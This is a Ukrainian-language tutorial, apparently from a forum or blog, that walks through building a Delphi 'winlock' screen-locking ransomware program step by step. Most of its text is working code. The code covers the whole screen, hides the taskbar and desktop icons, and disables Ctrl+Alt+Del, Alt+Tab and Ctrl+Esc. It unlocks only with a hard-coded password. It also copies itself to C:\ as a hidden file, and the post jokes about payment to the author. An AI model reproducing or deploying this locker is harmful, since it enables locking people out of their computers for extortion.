winlock (delphi)

85
Щоб написати дану програму потрібно:
1. Delphi.
2. 2 руки.
3. Голова.
4. 500 рублів (які в кінці уроку ви відправите мені)
Запускаємо Delphi, кидаємо на форму TImage (Щоб завантажити картинку блокіратора) TEdit, TButton.

Починаємо кодинг!
Код:

procedure TForm1.CreateParams(var T : TCreateParams);
begin
inherited Createparams(T);
with T do
Style := (Style or WS_POPUP) and not WS_DLGFRAME;
end;

Вище написаний код, не обов’язковий.

Створюємо подія OnActivate у Form1.
Пишемо це:

Код:

procedure TForm1.FormActivate(Sender: TObject);
var
hTaskBar : THandle;
begin
Edit1.Clear;
//виключаємо зі списку ALT+CTRL+DEL
ShowWindow (Application.handle, SW_HIDE);
//Розмір форми:=Розміром Екрану
form1.Height:=screen.Height;
form1.Width:=screen.Width;
//Відключаємо ALT+CTRL+DEl ALT+TAB, CTRL+ESC
SystemParametersInfo(SPI_SCREENSAVERRUNNING,1,0,0);
//Прибираємо Панель завдань
hTaskbar := FindWindow(‘Shell_TrayWnd’, Nil);
ShowWindow(hTaskBar, SW_HIDE);
//Прибираємо Іконки з робочого столу
ShowWindow(FindWindow(nil,’Program Manager),SW_HIDE);
end;
Ставимо вступні символи в TEdit під зірочки.
Код:
procedure TForm1.Edit1Change(Sender: TObject);
begin
Edit1.PasswordChar:=’*’;
end;

Можна звичайно в Object Inspector виставити цей параметр, але буду дотримуватися оригінальної статті.

Код:

procedure TForm1.Button1Click(Sender: TObject);
var
hTaskBar : THandle;
Password:string[10];
begin
Password:=edit1.text;
If (Password=’grabberz.com?) then
begin
//включаємо alt+ctrl+del alt+tab, ctrl+esc
SystemParametersInfo(SPI_SCREENSAVERRUNNING,0,0,0);
//Показуємо іконки на робочому столі
ShowWindow(FindWindow(nil,’Program Manager),SW_SHOW);
//Показуємо Панель Завдань
hTaskbar := FindWindow(‘Shell_TrayWnd’, Nil);
ShowWindow(hTaskBar, SW_SHOWNORMAL);
//Закриваємо прогу
Close;
end

Робимо перевірку на правильність пароля:

Код:

else
begin
Messagedlg(‘Невірний пас для розблокування… введіть коректный пас…’,mterror,[mbok],0);
Edit1.Clear;
end;
Всі. Як пише автор оригінальної статті, щоб додати програму в автозавантаження треба користуватися цим:
Код:
CopyFile(PChar(ParamStr(0)), PChar(‘C:\’+ ‘назва вінлока (будь назва).exe’),True);
SetFileAttributes(‘С:\название вінлока (будь назва).exe’, faHidden);

Автор статті не я, я лише виправив деякі речі, і виправив текст.
Відповідальності за код не несу.